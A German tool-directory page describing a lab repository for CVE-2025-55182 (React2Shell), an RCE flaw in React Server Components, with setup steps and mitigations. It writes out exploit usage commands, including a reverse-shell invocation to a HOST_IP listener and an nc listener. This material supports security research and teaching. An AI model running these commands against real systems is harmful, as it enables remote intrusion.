Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-55182-poc — Laborumgebung und PoC-Exploit für CVE-2025-55182 (React2Shell), eine kritische RCE-Sicherheitslücke in React Server Components. Beinhaltet eine angreifbare Anwendung, Exploit-Skripte und Scanner für Sicherheitsforschung und Bildung. | Kitploit
Tools/GitHubGitHub/mooowu/cve-2025-55182-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & BildungRemote-Access-ToolPayload-EntwicklungLabs & Praxis
GitHubmooowu/cve-2025-55182-poc

cve-2025-55182-poc

Laborumgebung und PoC-Exploit für CVE-2025-55182 (React2Shell), eine kritische RCE-Sicherheitslücke in React Server Components. Beinhaltet eine angreifbare Anwendung, Exploit-Skripte und Scanner für Sicherheitsforschung und Bildung.

7vor 7 MonatenNoch nicht geprüft
Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182 (React2Shell) Lab zur Schwachstellenanalyse

Dieses Repository enthält eine vollständige Umgebung zur Analyse und Reproduktion von CVE-2025-55182, einer kritischen Remote Code Execution (RCE)-Schwachstelle in React Server Components (RSC), die React 19.x und Next.js 15.x betrifft.

⚠️ WARNUNG: Dieses Projekt enthält absichtlich anfälligen Code. NICHT auf einem öffentlichen Server oder in einer Produktionsumgebung bereitstellen.

🔍 Schwachstellenübersicht

  • CVE-ID: CVE-2025-55182
  • Alias: React2Shell
  • CVSS-Score: 10.0 (KRITISCH)
  • Schwachstellentyp: CWE-502 (Deserialisierung nicht vertrauenswürdiger Daten)
  • Betroffene Komponenten:
    • React Server Components (19.0.0 - 19.2.0)
    • Next.js (15.0.0 - 16.0.7)
    • react-server-dom-webpack, react-server-dom-turbopack

Mechanismus

Die Schwachstelle besteht darin, wie die Laufzeit von React Server Components serialisierte Daten aus HTTP-Anfragen (Server Actions) verarbeitet. Ein Angreifer kann eine bösartige "Flight"-Protokollnutzlast erstellen, die beim Deserialisieren durch den Server beliebigen Code ausführt, bevor Authentifizierungsprüfungen stattfinden.

📂 Projektstruktur

root@kitploit:~
react2shell/
├── vulnerable-app/       # Vulnerable Next.js 15 application
│   ├── app/
│   │   ├── actions.ts    # Vulnerable Server Actions
│   │   └── page.tsx      # UI for testing vulnerability
│   ├── Dockerfile        # Container definition
│   └── package.json
├── exploit/              # Exploit tools
│   ├── exploit.py        # Python PoC exploit
│   ├── scanner.py        # Vulnerability scanner
│   └── quick_exploit.sh  # Simple bash exploit
├── docs/                 # Analysis documentation
└── docker-compose.yml    # Isolated lab environment

🚀 Erste Schritte

Voraussetzungen

  • Docker & Docker Compose
  • Python 3.x (zum lokalen Ausführen von Exploits)

1. Laborumgebung starten

Starten Sie die anfällige Anwendung in einem isolierten Container:

root@kitploit:~
docker-compose up -d --build

Die Anwendung ist unter http://localhost:3000 verfügbar.

2. Anwendung überprüfen

Besuchen Sie http://localhost:3000 in Ihrem Browser. Sie sollten die "React2Shell Lab"-Oberfläche mit mehreren Testfeldern sehen:

  • Befehlsausführung: Testen der direkten Befehlsinjektion
  • Unsicheres Deserialisieren: Testen von JSON-basierten Deserialisierungs-Exploits
  • Beliebige Dateiauslese: Testen von Path Traversal
  • Systeminfo: Anzeige von Systemdetails (zur Überprüfung der RCE-Auswirkung)

⚔️ Ausnutzung

Wir stellen mehrere Werkzeuge zur Verfügung, um die Schwachstelle zu testen.

Verwendung des Python-Exploits

  1. Abhängigkeiten installieren:

    root@kitploit:~
    pip install -r exploit/requirements.txt
    
  2. Prüfen, ob anfällig:

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 --check
    
  3. Befehl ausführen:

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 -c "id"
    
  4. Reverse Shell (erfordert einen Listener, z.B. nc -lvnp 4444):

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 --revshell -l HOST_IP -p 4444
    

Verwendung des Scanners

Nach anfälligen React/Next.js-Instanzen scannen:

root@kitploit:~
python3 exploit/scanner.py -u http://localhost:3000

🛡️ Gegenmaßnahmen

Um diese Schwachstelle in Ihren eigenen Anwendungen zu beheben:

  1. Abhängigkeiten aktualisieren:

    • Aktualisieren Sie React auf Version 19.3.0 oder höher.
    • Aktualisieren Sie Next.js je nach Branch auf Version 15.0.5, 15.1.9 oder 16.0.8.
  2. Patch überprüfen: Überprüfen Sie package.json, ob die Pakete react-server-dom-* aktualisiert sind.

📝 Haftungsausschluss

Dieses Projekt dient ausschließlich Bildungszwecken und der Sicherheitsforschung. Die Autoren übernehmen keine Verantwortung für den Missbrauch dieses Materials.

Tool herunterladen